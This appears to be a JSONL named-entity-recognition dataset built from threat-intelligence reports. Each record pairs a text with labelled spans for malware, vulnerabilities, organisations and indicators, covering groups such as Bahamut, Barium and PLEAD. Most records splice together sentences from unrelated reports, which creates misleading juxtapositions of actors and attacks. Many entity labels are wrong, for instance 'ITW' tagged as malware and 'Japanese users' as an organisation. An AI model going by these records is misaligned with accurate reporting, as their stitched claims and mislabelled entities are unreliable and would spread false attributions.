{"text": "The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . As we wrote then , compared to Kingphish , Bahamut operates as though it were a generation ahead in terms of professionalism and ambition .", "spans": [{"start": 146, "end": 152, "label": "Malware"}, {"start": 172, "end": 186, "label": "Vulnerability"}, {"start": 190, "end": 203, "label": "Vulnerability"}]}
{"text": "After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft\u2019s Equation Editor (EQNEDT32) . In the Bahamut report , we discussed two domains found within our search that were linked with a custom Android malware agent .", "spans": [{"start": 52, "end": 61, "label": "Malware"}, {"start": 82, "end": 95, "label": "Vulnerability"}, {"start": 195, "end": 202, "label": "Malware"}, {"start": 251, "end": 279, "label": "Malware"}]}
{"text": "Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . After the publication of the original report , these sites were taken offline despite the fact that one agent was even updated a six days prior to our post ( the \" Khuai \" application ) .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 86, "end": 89, "label": "Malware"}, {"start": 117, "end": 130, "label": "Vulnerability"}, {"start": 297, "end": 302, "label": "Malware"}]}
{"text": "CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . FIF is notable for its links to the Lashkar-e-Taiba ( LeT ) terrorist organization , which has committed mass-casualty attacks in India in support of establishing Pakistani control over the disputed Jammu and Kashmir border region .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 91, "end": 103, "label": "Organization"}, {"start": 170, "end": 185, "label": "Organization"}, {"start": 188, "end": 191, "label": "Organization"}]}
{"text": "As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . As a result , it is already flagged as Bahamut by antivirus engines .", "spans": [{"start": 28, "end": 42, "label": "Vulnerability"}, {"start": 47, "end": 60, "label": "Vulnerability"}, {"start": 67, "end": 77, "label": "System"}, {"start": 126, "end": 132, "label": "Organization"}]}
{"text": "Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . Our initial observation of the Bahamut group originated from in-the-wild attempts to deceive targets into providing account passwords through impersonation of platform providers .", "spans": [{"start": 90, "end": 103, "label": "Organization"}, {"start": 122, "end": 135, "label": "Vulnerability"}, {"start": 145, "end": 159, "label": "System"}, {"start": 321, "end": 339, "label": "Organization"}]}
{"text": "These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software .", "spans": [{"start": 37, "end": 50, "label": "Organization"}, {"start": 103, "end": 116, "label": "Vulnerability"}, {"start": 402, "end": 421, "label": "Malware"}]}
{"text": "Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . Curiously , Bahamut appears to track password attempts in response to failed phishing attempts or to provoke the target to provide more passwords .", "spans": [{"start": 66, "end": 80, "label": "Vulnerability"}, {"start": 147, "end": 161, "label": "Malware"}, {"start": 192, "end": 204, "label": "Malware"}]}
{"text": "Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . Bahamut spearphishing attempts have also been accompanied with SMS messages purporting to be from Google about security issues on their account , including a class 0 message or \" Flash text \" . These text messages did not include links but are intended to build credibility around the fake service notifications later sent to the target 's email address .", "spans": [{"start": 87, "end": 100, "label": "Vulnerability"}, {"start": 118, "end": 143, "label": "Malware"}, {"start": 146, "end": 158, "label": "Malware"}, {"start": 308, "end": 314, "label": "Organization"}, {"start": 389, "end": 394, "label": "System"}, {"start": 550, "end": 555, "label": "System"}]}
{"text": "Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT Maudi Surveillance Operation which was previously reported in 2013 . We have not found evidence of Bahamut engaging in crime or operating outside its limited geographic domains , although this narrow perspective could be accounted for by its compartmentalization of operations .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 54, "end": 67, "label": "Vulnerability"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 244, "end": 251, "label": "Organization"}]}
{"text": "specifically CVE-2018-0798 , before downloading subsequent payloads . Thus far , Bahamut 's campaigns have appeared to be primarily espionage or information operations \u2013 not destructive attacks or fraud .", "spans": [{"start": 13, "end": 26, "label": "Vulnerability"}, {"start": 81, "end": 88, "label": "Organization"}]}
{"text": "Dubbed \u2018Operation Sheep\u2019 , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . The targets and themes of Bahamut 's campaigns have consistently fallen within two regions \u2013 South Asia ( primarily Pakistan , specifically Kashmir ) and the Middle East ( from Morocco to Iran ) .", "spans": [{"start": 7, "end": 24, "label": "Organization"}, {"start": 123, "end": 138, "label": "Vulnerability"}]}
{"text": "Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence . Our prior publication also failed to acknowledge immensely valuable input from a number of colleagues , including Nadim Kobeissi 's feedback on how the API endpoints on the Android malware were encrypted .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 52, "end": 59, "label": "Vulnerability"}, {"start": 69, "end": 82, "label": "Vulnerability"}, {"start": 294, "end": 301, "label": "System"}, {"start": 302, "end": 309, "label": "Malware"}]}
{"text": "We\u2019ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . Bahamut targeted similar Qatar-based individuals during their campaign .", "spans": [{"start": 34, "end": 44, "label": "Organization"}, {"start": 134, "end": 148, "label": "Vulnerability"}, {"start": 151, "end": 158, "label": "Organization"}]}
{"text": "In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using http://voguextra.com/decoy.doc .", "spans": [{"start": 33, "end": 43, "label": "Malware"}, {"start": 228, "end": 242, "label": "Vulnerability"}, {"start": 245, "end": 255, "label": "Organization"}, {"start": 324, "end": 339, "label": "Indicator"}, {"start": 355, "end": 365, "label": "System"}, {"start": 377, "end": 407, "label": "Indicator"}]}
{"text": "The actor attempts to exploit CVE-2018\u20138440 \u2014 an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call \u2014 to elevate the privileges using a modified proof-of-concept exploit . The China-backed Barium APT is suspected to be at the helm of the project .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 30, "end": 43, "label": "Vulnerability"}, {"start": 72, "end": 85, "label": "Vulnerability"}, {"start": 208, "end": 224, "label": "Vulnerability"}, {"start": 225, "end": 232, "label": "Vulnerability"}, {"start": 252, "end": 258, "label": "Organization"}]}
{"text": "The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . Trojanized versions of the utility were then signed with legitimate certificates and were hosted on and distributed from official ASUS update servers \u2013 which made them mostly invisible to the vast majority of protection solutions , according to Kaspersky Lab .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 146, "end": 159, "label": "Vulnerability"}, {"start": 162, "end": 175, "label": "Vulnerability"}, {"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 207, "end": 215, "label": "Organization"}, {"start": 501, "end": 514, "label": "Organization"}]}
{"text": "Previously , Cloud Atlas dropped its validator\u201d implant named PowerShower\u201d directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 . Kaspersky Lab To compromise the utility , Kaspersky Lab determined that the cyberattackers used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code .", "spans": [{"start": 13, "end": 24, "label": "Organization"}, {"start": 140, "end": 154, "label": "Vulnerability"}, {"start": 166, "end": 179, "label": "Vulnerability"}, {"start": 182, "end": 195, "label": "Organization"}, {"start": 224, "end": 237, "label": "Organization"}]}
{"text": "The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . To compromise the utility , Kaspersky Lab determined that Barium used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code .", "spans": [{"start": 14, "end": 21, "label": "Malware"}, {"start": 82, "end": 95, "label": "Vulnerability"}, {"start": 161, "end": 174, "label": "Organization"}, {"start": 191, "end": 197, "label": "Organization"}]}
{"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . BARIUM , a Chinese state player that also goes by APT17 , Axiom and Deputy Dog , was previously linked to the ShadowPad and CCleaner incidents , which were also supply-chain attacks that used software updates to sneak onto machines .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 62, "end": 81, "label": "Malware"}, {"start": 105, "end": 111, "label": "Organization"}, {"start": 155, "end": 160, "label": "Organization"}, {"start": 163, "end": 168, "label": "Organization"}, {"start": 173, "end": 179, "label": "Organization"}, {"start": 180, "end": 183, "label": "Organization"}, {"start": 215, "end": 224, "label": "Malware"}, {"start": 229, "end": 237, "label": "Malware"}, {"start": 297, "end": 313, "label": "Malware"}]}
{"text": "Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability . That said , the \" fingerprints \" left on the samples by the attackers \u2013 including techniques used to achieve unauthorized code execution \u2013 suggest that the BARIUM APT is behind the effort , according to the researchers .", "spans": [{"start": 65, "end": 72, "label": "Vulnerability"}, {"start": 81, "end": 109, "label": "Vulnerability"}, {"start": 268, "end": 278, "label": "Organization"}]}
{"text": "The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs . In the 2017 ShadowPad attack , the update mechanism for Korean server management software provider NetSarang was compromised to serve up an eponymous backdoor .", "spans": [{"start": 4, "end": 11, "label": "Vulnerability"}, {"start": 21, "end": 30, "label": "Organization"}, {"start": 52, "end": 70, "label": "Malware"}, {"start": 165, "end": 200, "label": "Organization"}]}
{"text": "We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . In the next incident , also in 2017 , software updates for the legitimate computer cleanup tool CCleaner was found to have been compromised by hackers to taint them with the same ShadowPad backdoor .", "spans": [{"start": 11, "end": 25, "label": "Organization"}, {"start": 55, "end": 68, "label": "Vulnerability"}, {"start": 104, "end": 117, "label": "Vulnerability"}, {"start": 271, "end": 287, "label": "Malware"}, {"start": 412, "end": 430, "label": "Malware"}]}
{"text": "Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 . NetSarang , which has headquarters in South Korea and the United States , removed the backdoored update , but not before it was activated on at least one victim 's machine in Hong Kong .", "spans": [{"start": 75, "end": 88, "label": "Vulnerability"}]}
{"text": "NetWire , DarkComet , NanoCore , LuminosityLink , Remcos and Imminent Monitor are all designed to provide remote access to compromised systems . Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions other Gulf states , Bahamut 's interests are seemingly too expansive to be limited one sponsor or customer .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 10, "end": 19, "label": "System"}, {"start": 22, "end": 30, "label": "System"}, {"start": 33, "end": 47, "label": "System"}, {"start": 50, "end": 56, "label": "System"}, {"start": 61, "end": 77, "label": "System"}, {"start": 98, "end": 119, "label": "Malware"}, {"start": 229, "end": 251, "label": "Organization"}, {"start": 273, "end": 300, "label": "Organization"}]}
{"text": "The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes . Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks .", "spans": [{"start": 53, "end": 65, "label": "Organization"}, {"start": 81, "end": 89, "label": "System"}, {"start": 95, "end": 112, "label": "Malware"}, {"start": 115, "end": 121, "label": "Organization"}, {"start": 244, "end": 253, "label": "Organization"}, {"start": 297, "end": 309, "label": "Organization"}, {"start": 386, "end": 395, "label": "Organization"}]}
{"text": "This ' connection bouncer ' tool lets the threat actor redirect ports and connections between different networks and obfuscate C2 server traffic . We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post .", "spans": [{"start": 7, "end": 25, "label": "System"}, {"start": 42, "end": 54, "label": "Organization"}, {"start": 64, "end": 85, "label": "Malware"}, {"start": 220, "end": 227, "label": "Organization"}, {"start": 243, "end": 262, "label": "Indicator"}, {"start": 298, "end": 300, "label": "System"}]}
{"text": "It is capable of a variety of functions , including credential theft , hard drive and data wiping , disabling security software , and remote desktop functionality . Althoughthe BariumDefendants have relied on differentand distinct infrastructures in an effortto evade detection , Bariumused the same e-mail address ( hostay88@gmail.com ) to register malicious domains used in connection with at least two toolsets that Barium has employed to compromise victim computers .", "spans": [{"start": 52, "end": 68, "label": "Malware"}, {"start": 71, "end": 81, "label": "Malware"}, {"start": 86, "end": 97, "label": "Malware"}, {"start": 100, "end": 127, "label": "Malware"}, {"start": 134, "end": 162, "label": "Malware"}, {"start": 300, "end": 306, "label": "System"}, {"start": 317, "end": 335, "label": "Indicator"}, {"start": 419, "end": 425, "label": "Organization"}]}
{"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . The second method , described in Part D.2 , below , involves the \" ShadowPad \" malware , which the Barium Defendants have distributed via a third-party software provider 's compromised update .", "spans": [{"start": 18, "end": 27, "label": "Malware"}, {"start": 57, "end": 70, "label": "Malware"}, {"start": 153, "end": 162, "label": "Malware"}, {"start": 185, "end": 191, "label": "Organization"}, {"start": 226, "end": 255, "label": "Organization"}]}
{"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . To enhance the effectiveness of phishing attacks into the organization , Barium will collect additional background informationfrom social media sites .", "spans": [{"start": 22, "end": 26, "label": "Malware"}, {"start": 27, "end": 65, "label": "Malware"}, {"start": 236, "end": 242, "label": "Organization"}, {"start": 294, "end": 306, "label": "Organization"}]}
{"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . Employing a technique known as \" spear phishing \" , Barium has heavily targeted individuals within HumanResources or Business Developmentdepartments ofthe targeted organizations in order to compromise the computers ofsuch individuals .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 102, "end": 109, "label": "Malware"}, {"start": 137, "end": 147, "label": "Malware"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 251, "end": 257, "label": "Organization"}]}
{"text": "Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll\u201d along with a standard Vawtrak trojan . The first method , described in Part D.l , below , involves the \" Barlaiy \" and \" PlugXL \" malware , which the Barium Defendants propagate using phishing techniques .", "spans": [{"start": 76, "end": 84, "label": "Malware"}, {"start": 102, "end": 114, "label": "Malware"}, {"start": 230, "end": 237, "label": "Malware"}, {"start": 246, "end": 252, "label": "Malware"}, {"start": 275, "end": 281, "label": "Organization"}]}
{"text": "RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism . Using the information gathered from its reconnaissance on social media sites , Barium packages the phishing e-mail in a ACT that gives the e-mail credibility to the target user , often by making the e-mail appear as ifit were sent from an organization known to and trusted by the victim or concerning a topic of interest to the victim .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 7, "end": 29, "label": "Malware"}, {"start": 198, "end": 210, "label": "Organization"}, {"start": 219, "end": 225, "label": "Organization"}, {"start": 279, "end": 285, "label": "System"}, {"start": 339, "end": 345, "label": "System"}]}
{"text": "RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . Barium Defendants install the malicious \" Win32/Barlaiy \" malware and the malicious \" Win32/PlugX.L \" malware on victim computers using the means described above .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 12, "end": 19, "label": "Malware"}, {"start": 77, "end": 88, "label": "Organization"}, {"start": 98, "end": 128, "label": "Malware"}, {"start": 143, "end": 149, "label": "Organization"}, {"start": 185, "end": 198, "label": "Malware"}, {"start": 229, "end": 242, "label": "Malware"}]}
{"text": "Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . Both Win32/Barlaiy & Win32/PlugX.L are remote access \" trojans \" , which allow Barium to gather a victim 's information , control a victim 's device , install additional malware , and exfiltrate information fi-om a victim 's device .", "spans": [{"start": 58, "end": 64, "label": "Malware"}, {"start": 70, "end": 89, "label": "Malware"}, {"start": 137, "end": 150, "label": "Malware"}, {"start": 153, "end": 166, "label": "Malware"}, {"start": 211, "end": 217, "label": "Organization"}]}
{"text": "This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . Barium Defendants install the malicious credential stealing and injection tool known as \" Win32/RibDoor.A!dha \" .", "spans": [{"start": 5, "end": 12, "label": "Malware"}, {"start": 35, "end": 71, "label": "Malware"}, {"start": 76, "end": 105, "label": "Malware"}, {"start": 135, "end": 141, "label": "Organization"}, {"start": 225, "end": 244, "label": "Malware"}]}
{"text": "From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" .", "spans": [{"start": 43, "end": 48, "label": "Malware"}, {"start": 74, "end": 83, "label": "Malware"}, {"start": 190, "end": 199, "label": "Organization"}, {"start": 251, "end": 257, "label": "Organization"}, {"start": 296, "end": 313, "label": "Indicator"}]}
{"text": "Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) .", "spans": [{"start": 55, "end": 62, "label": "Malware"}, {"start": 84, "end": 94, "label": "Malware"}, {"start": 156, "end": 171, "label": "Malware"}, {"start": 220, "end": 230, "label": "Indicator"}, {"start": 360, "end": 377, "label": "Indicator"}]}
{"text": "FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL\u2019s Kalignite multivendor ATM platform . Figure 9a , below , shows detections of encounters with the Barium actors and their infrastructure , including infected computers located in Virginia , and Figure 9b , below , shows detections of encounters throughout the United States .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 68, "end": 75, "label": "Malware"}, {"start": 85, "end": 94, "label": "Malware"}, {"start": 102, "end": 111, "label": "Malware"}, {"start": 220, "end": 226, "label": "Organization"}]}
{"text": "That post included download links for a slew of NSA hacking tools and exploits , many of which could be used to break into hardware firewall appliances , and in turn , corporate or government networks . Barium has targeted Microsoft customers both in Virginia , the United States , and around the world .", "spans": [{"start": 48, "end": 51, "label": "Organization"}, {"start": 112, "end": 151, "label": "Malware"}, {"start": 168, "end": 200, "label": "Malware"}, {"start": 203, "end": 209, "label": "Organization"}, {"start": 223, "end": 242, "label": "Organization"}]}
{"text": "Some hackers even went onto use the Cisco exploits in the wild . Once the Barium Defendants have access to a victim computer through the malware described above , they monitor the victim 's activity and ultimately search for and steal sensitive documents ( for example , Exfiltration of intellectual property regarding technology has been seen ) , and personal information fi\"om the victim 's network .", "spans": [{"start": 36, "end": 50, "label": "Vulnerability"}, {"start": 74, "end": 80, "label": "Organization"}, {"start": 319, "end": 329, "label": "Organization"}]}
{"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . According to a 49-page report published Thursday , all of the attacks are the work of Chinese government 's intelligence apparatus , which the report 's authors dub the Winnti Umbrella .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 45, "end": 64, "label": "Malware"}, {"start": 67, "end": 79, "label": "Malware"}, {"start": 84, "end": 119, "label": "Malware"}, {"start": 291, "end": 306, "label": "Organization"}]}
{"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . Researchers from various security organizations have used a variety of names to assign responsibility for the hacks , including LEAD , BARIUM , Wicked Panda , GREF , PassCV , Axiom , and Winnti .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 45, "end": 64, "label": "Malware"}, {"start": 67, "end": 79, "label": "Malware"}, {"start": 84, "end": 119, "label": "Malware"}, {"start": 250, "end": 254, "label": "Organization"}, {"start": 257, "end": 263, "label": "Organization"}, {"start": 266, "end": 278, "label": "Organization"}, {"start": 281, "end": 285, "label": "Organization"}, {"start": 288, "end": 294, "label": "Organization"}, {"start": 297, "end": 302, "label": "Organization"}, {"start": 309, "end": 315, "label": "Organization"}]}
{"text": "PeddleCheap is a plugin of DanderSpritz which can be used to configure implants and connect to infected machines . It targets organizations in Japan , South Korea , and Taiwan , leveling its attacks on public sector agencies and telecommunications and other high-technology industries .", "spans": [{"start": 0, "end": 11, "label": "System"}, {"start": 27, "end": 39, "label": "System"}, {"start": 61, "end": 79, "label": "Malware"}, {"start": 84, "end": 112, "label": "Malware"}, {"start": 202, "end": 224, "label": "Organization"}, {"start": 229, "end": 247, "label": "Organization"}, {"start": 258, "end": 284, "label": "Organization"}]}
{"text": "Each of them consists of a set of plugins designed for different tasks : while FuzzBunch plugins are responsible for reconnaissance and attacking a victim , plugins in the DanderSpritz framework are developed for managing already infected victims . In 2016 , for instance , we found their campaigns attacking Japanese organizations with various malware tools , notably the Elirks backdoor .", "spans": [{"start": 79, "end": 96, "label": "System"}, {"start": 117, "end": 147, "label": "Malware"}, {"start": 172, "end": 184, "label": "System"}, {"start": 213, "end": 246, "label": "Malware"}, {"start": 373, "end": 388, "label": "Malware"}]}
{"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . Blackgear has been targeting various industries since its emergence a decade ago .", "spans": [{"start": 46, "end": 68, "label": "Vulnerability"}, {"start": 163, "end": 190, "label": "Malware"}, {"start": 195, "end": 203, "label": "Malware"}]}
{"text": "The ShadowBrokers is a group of hackers known for leaking exclusive information about the National Security Agency \u2013 NSA 's hacking tools and tactics . Blackgear 's campaigns also use email as an entry point , which is why it's important to secure the email gateACT .", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 117, "end": 120, "label": "Organization"}]}
{"text": "It captures information using plugins to compromise webcam and microphone output along with documenting log keystrokes , carrying out surveillance and access external drives . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years .", "spans": [{"start": 3, "end": 23, "label": "Malware"}, {"start": 121, "end": 146, "label": "Malware"}, {"start": 151, "end": 173, "label": "Malware"}, {"start": 230, "end": 235, "label": "Organization"}]}
{"text": "Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . Our research indicates that it has started targeting Japanese users .", "spans": [{"start": 29, "end": 44, "label": "Malware"}, {"start": 45, "end": 65, "label": "Malware"}, {"start": 148, "end": 177, "label": "Malware"}, {"start": 304, "end": 318, "label": "Organization"}]}
{"text": "The toolset includes reams of documentation explaining how the cyber weapons work , as well as details about their use in highly classified intelligence operations abroad . The malware tools used by BLACKGEAR can be categorized into three categories : binders , downloaders and backdoors .", "spans": [{"start": 44, "end": 76, "label": "Malware"}, {"start": 252, "end": 259, "label": "Malware"}, {"start": 262, "end": 273, "label": "Malware"}, {"start": 278, "end": 287, "label": "Malware"}]}
{"text": "The Ham Backdoor functions primarily as a modular platform , which provides the attacker with the ability to directly download additional modules and execute them in memory from the command and control ( C2 ) server . Binders are delivered by attack vectors ( such as phishing and watering hole attacks ) onto a machine .", "spans": [{"start": 4, "end": 16, "label": "System"}, {"start": 118, "end": 145, "label": "Malware"}, {"start": 218, "end": 225, "label": "Malware"}]}
{"text": "Originally targeting Western European banks , Emotet has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . Based on the mutexes and domain names of some of their C&C servers , BlackTech 's campaigns are likely designed to steal their target 's technology .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 46, "end": 52, "label": "System"}, {"start": 166, "end": 172, "label": "System"}, {"start": 199, "end": 212, "label": "Malware"}, {"start": 215, "end": 235, "label": "Malware"}, {"start": 238, "end": 248, "label": "Malware"}, {"start": 251, "end": 262, "label": "Malware"}, {"start": 269, "end": 273, "label": "Malware"}, {"start": 346, "end": 349, "label": "System"}]}
{"text": "Originally targeting Western European banks , it has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns : PLEAD , Shrouded Crossbow , and of late , Waterbear .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 162, "end": 168, "label": "System"}, {"start": 195, "end": 208, "label": "Malware"}, {"start": 211, "end": 231, "label": "Malware"}, {"start": 234, "end": 244, "label": "Malware"}, {"start": 247, "end": 258, "label": "Malware"}, {"start": 265, "end": 269, "label": "Malware"}]}
{"text": "Beginning in mid-January 2019 , TA542 distributed millions of Emotet-laden emails in both English and German . Active since 2012 , it has so far targeted Taiwanese government agencies and private organizations .", "spans": [{"start": 164, "end": 183, "label": "Organization"}]}
{"text": "DanaBot is a Trojan that includes banking site web injections and stealer functions . PLEAD uses spear-phishing emails to deliver and install their backdoor , either as an attachment or through links to cloud storage services .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 13, "end": 19, "label": "System"}, {"start": 34, "end": 61, "label": "Malware"}, {"start": 66, "end": 83, "label": "Malware"}, {"start": 112, "end": 118, "label": "System"}, {"start": 203, "end": 225, "label": "Malware"}]}
{"text": "Two binder tools \u2014 used to disguise custom executables as legitimate Microsoft implants \u2014 were discovered by Falcon Intelligence and linked to MYTHIC LEOPARD in July 2017 . PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach .", "spans": [{"start": 27, "end": 54, "label": "Malware"}, {"start": 69, "end": 78, "label": "Organization"}, {"start": 109, "end": 128, "label": "Organization"}, {"start": 143, "end": 157, "label": "Organization"}, {"start": 267, "end": 274, "label": "Vulnerability"}, {"start": 281, "end": 286, "label": "System"}, {"start": 303, "end": 316, "label": "Vulnerability"}]}
{"text": "Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 79, "end": 98, "label": "Malware"}, {"start": 108, "end": 117, "label": "Organization"}, {"start": 136, "end": 149, "label": "Vulnerability"}, {"start": 184, "end": 193, "label": "Organization"}, {"start": 194, "end": 223, "label": "System"}, {"start": 226, "end": 229, "label": "System"}]}
{"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . This campaign , first observed in 2010 , is believed to be operated by a well-funded group given how it appeared to have purchased the source code of the BIFROST backdoor , which the operators enhanced and created other tools from .", "spans": [{"start": 49, "end": 62, "label": "Malware"}, {"start": 192, "end": 210, "label": "Malware"}, {"start": 214, "end": 232, "label": "Malware"}]}
{"text": "This isn\u2019t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . Shrouded Crossbow targeted privatized agencies and government contractors as well as enterprises in the consumer electronics , computer , healthcare , and financial industries .", "spans": [{"start": 26, "end": 28, "label": "Malware"}, {"start": 111, "end": 137, "label": "Malware"}, {"start": 142, "end": 162, "label": "Malware"}, {"start": 192, "end": 211, "label": "Organization"}, {"start": 216, "end": 238, "label": "Organization"}, {"start": 250, "end": 261, "label": "Organization"}, {"start": 269, "end": 289, "label": "Organization"}, {"start": 292, "end": 300, "label": "Organization"}, {"start": 303, "end": 313, "label": "Organization"}, {"start": 320, "end": 340, "label": "Organization"}]}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Shrouded Crossbow employs three BIFROST-derived backdoors : BIFROSE , KIVARS , and XBOW .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 191, "end": 216, "label": "Malware"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 229, "end": 235, "label": "Malware"}, {"start": 242, "end": 246, "label": "Malware"}]}
{"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents .", "spans": [{"start": 22, "end": 26, "label": "Malware"}, {"start": 27, "end": 65, "label": "Malware"}, {"start": 214, "end": 220, "label": "System"}, {"start": 270, "end": 284, "label": "Malware"}, {"start": 304, "end": 319, "label": "Indicator"}]}
